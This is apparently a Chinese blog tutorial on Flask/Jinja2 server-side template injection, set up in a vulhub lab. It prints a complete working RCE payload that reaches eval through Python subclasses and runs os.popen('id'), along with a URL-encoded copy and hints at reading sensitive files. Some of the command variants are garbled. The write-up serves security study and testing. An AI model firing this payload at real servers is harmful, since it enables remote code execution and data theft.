【Flask(Jinja2)服务端模板注入漏洞】
一、SSTI漏洞概述服务端模板注入Server-Side Template InjectionSSTI是一种发生在Web应用程序中的安全漏洞攻击者能够向模板引擎注入恶意模板代码从而在服务器端执行任意代码。二、Flask介绍Flask是一个流行的Python Web框架使用Jinja2作为其模板引擎。当用户输入未经适当过滤就直接在Jinja2模板中渲染时可能会导致服务端模板注入SSTI漏洞进而可能导致远程代码执行。Flask应用的结构三、环境搭建从vulhub中拉取漏洞镜像。https://vulhub.org/zh环境启动后访问http://your-ip:8000/即可查看到默认页面。四、漏洞详情首先访问以下URL验证SSTI漏洞是否存在http://localhost:8000/?name{{7*7}}看到结果是49要实现远程代码执行可以使用以下POC获取eval函数并执行任意Python代码{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ catch_warnings %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ {}.__class__ %} {% if eval in b.keys() %} {{ b[eval](__import__(os).popen(id).read()) }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}替换恶意代码即可实现更多攻击只需修改最后一步eval中的字符串就能实现任意攻击行为比如读取服务器敏感文件{{ b’eval’ }}执行其他系统命令{{ b’eval’ }}查看服务器网络配置{{ b[‘eval’](‘import(“os”).popen(“ip addr”).read()’) }}http://your-ip:8000/?name%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__(%22os%22).popen(%22id%22).read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D免责声明本公众号分享的网络安全工具与资料仅用于合法授权的教育、研究、安全测试及防御目的。任何使用者应确保其行为符合《网络安全法》等相关法律法规严禁用于任何非法或未授权访问。所有工具与实验均存在一定风险请在具备相应知识或专业人员指导下于自有或已获授权的环境中测试。因使用、传播相关内容而产生的任何直接或间接后果本公众号及作者概不承担责任。请务必在法律允许范围内安全、负责地使用技术。参考链接https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdfhttp://rickgray.me/use-python-features-to-execute-arbitrary-codes-in-jinja2-templates

相关新闻

超越筛选:Scikit-learn特征选择API的深度实践与创新融合

超越筛选:Scikit-learn特征选择API的深度实践与创新融合

好的,这是一篇关于Scikit-learn特征选择API的深度技术文章,旨在为开发者提供超越基础教程的见解和实战技巧。超越筛选:Scikit-learn特征选择API的深度实践与创新融合 引言:特征选择的“道”与“器” 在机器学习项目中,…

2026/6/29 19:48:16 阅读更多 →
Linux命令-losetup(设定与控制循环(loop)设备)

Linux命令-losetup(设定与控制循环(loop)设备)

🧭说明 losetup 命令用于在 Linux 中设置和管理循环设备,它能够将普通文件(如磁盘镜像、ISO 文件)虚拟成块设备,从而可以像操作物理硬盘一样对其进行挂载、格式化和访问。 以下是 losetup 的核心用法和常见场景。 &…

2026/7/3 8:15:15 阅读更多 →
【二十四节气】立春

【二十四节气】立春

立春是二十四节气之首,标志着万物复苏、阳气初生,自古以来在中国农耕文化和社会生活中占有重要地位。项目内容名称含义“立”表示开始,“春”代表温暖与生长,合起来指春季的开始节气位置二十四节气中的第一个,标志着新…

2026/6/29 19:25:26 阅读更多 →

最新新闻

解锁Switch游戏新体验:yuzu模拟器完全指南

解锁Switch游戏新体验:yuzu模拟器完全指南

解锁Switch游戏新体验:yuzu模拟器完全指南 【免费下载链接】yuzu 任天堂 Switch 模拟器 项目地址: https://gitcode.com/GitHub_Trending/yu/yuzu 想在电脑上畅玩任天堂Switch游戏吗?yuzu模拟器为你带来前所未有的游戏体验!作为目前最…

2026/7/3 9:16:37 阅读更多 →
YOLOv8为何仍是目标检测首选?从核心原理到实战部署全解析

YOLOv8为何仍是目标检测首选?从核心原理到实战部署全解析

🚀 30款热门AI模型一站整合,DeepSeek/GLM/Claude 随心用,限时 5 折。 👉 点击领海量免费额度 如果你刚接触目标检测,或者正在为项目选型,看到“YOLOv26”这个版本号,第一反应可能是&#xff…

2026/7/3 9:16:37 阅读更多 →
原来长春市场竟有产品稳定的专业宝马原厂升级产品?

原来长春市场竟有产品稳定的专业宝马原厂升级产品?

行业痛点分析在长春宝马原厂升级领域,存在诸多核心技术挑战。许多车主面临不知道哪里改装专业的问题,数据表明,约 60%的车主担心被宰,害怕遇到技术不专业的改装店。同时,近 50%的车主担忧师傅拆装有瑕疵,还…

2026/7/3 9:14:36 阅读更多 →
Windows触控板革命:如何通过三指拖拽实现macOS级效率体验

Windows触控板革命:如何通过三指拖拽实现macOS级效率体验

Windows触控板革命:如何通过三指拖拽实现macOS级效率体验 【免费下载链接】ThreeFingersDragOnWindows Enables macOS-style three-finger dragging functionality on Windows Precision touchpads. 项目地址: https://gitcode.com/gh_mirrors/th/ThreeFingersDra…

2026/7/3 9:12:36 阅读更多 →
惠普OMEN游戏本终极性能解锁指南:OmenSuperHub完全控制你的笔记本

惠普OMEN游戏本终极性能解锁指南:OmenSuperHub完全控制你的笔记本

惠普OMEN游戏本终极性能解锁指南:OmenSuperHub完全控制你的笔记本 【免费下载链接】OmenSuperHub Control Omen laptop performance, fan speeds, and keyboard lighting, and unlock power limits. 项目地址: https://gitcode.com/gh_mirrors/om/OmenSuperHub …

2026/7/3 9:08:35 阅读更多 →
2026年最值得关注的AI编程工具盘点

2026年最值得关注的AI编程工具盘点

2026年最值得关注的AI编程工具盘点这两年 AI 编程工具井喷式发展,从 GitHub Copilot 到 Cursor,再到各种大厂入局,开发者的选择越来越多。我从去年开始陆续深度使用了十几款工具,这里分享一下真实体验,帮大家避坑。为什…

2026/7/3 9:06:34 阅读更多 →

日新闻

Nginx防御TLS重协商攻击实战:从原理到配置与监控

Nginx防御TLS重协商攻击实战:从原理到配置与监控

1. 项目概述:为什么TLS重协商攻击至今仍需警惕十多年前的CVE-2011-1473,一个关于TLS/SSL协议重协商机制的漏洞,现在提起来还有必要吗?很多运维和开发朋友可能会觉得,这都老掉牙了,现代服务器和客户端不都默…

2026/7/3 0:03:59 阅读更多 →
华为防火墙双通道远程管理实战:Web与SSH配置详解

华为防火墙双通道远程管理实战:Web与SSH配置详解

1. 项目概述:为什么需要双通道远程管理防火墙?在任何一个稍具规模的企业网络里,防火墙都是那个默默守护在边界的关键角色。作为网络工程师,我们不可能每次都跑到机房,插上console线去配置它。远程管理能力,…

2026/7/3 0:03:59 阅读更多 →
AD74413R与PIC18F65K40的高精度工业数据采集方案

AD74413R与PIC18F65K40的高精度工业数据采集方案

1. 项目概述:AD74413R与PIC18F65K40的协同工作在工业自动化和精密测量领域,同时实现高精度模数转换(ADC)和数模转换(DAC)功能是许多复杂系统的核心需求。AD74413R作为一款四通道可配置模拟输入/输出器件,与PIC18F65K40微控制器的组合&#xf…

2026/7/3 0:05:59 阅读更多 →

周新闻

月新闻